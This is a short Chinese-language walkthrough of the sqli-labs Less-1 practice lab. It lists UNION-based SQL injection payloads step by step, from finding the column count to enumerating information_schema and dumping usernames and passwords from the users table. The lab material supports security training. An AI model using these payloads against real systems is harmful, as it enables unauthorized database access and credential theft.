初始网页
从网页可知传递的参数名为 id,并且为数字类型
1、得知数据表有多少列
1.1 使用联合查询查找列数(效率低)
sql
http://localhost/sqli-labs-master/Less-1/?id=1' union select 1,2 --+
1.2 使用order by查找列数(效率高)
sql
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3 --+
2、查看回显位置
sql
?id=-1' union select 1,2,3 --+
3、查询当前数据库名
sql
?id=-1' union select 1,database(),3 --+
4、查询当前表名
sql
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
5、查询列名
sql
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+
6、查询最终数据
sql
?id=-1' union select 1,group_concat(username,0x3a,password),3 from users --+
其他
查询当前数据库版本
sql
?id=-1' union select 1,version(),3 --+
查询当前登录用户
sql
?id=-1' union select 1,user(),3 --+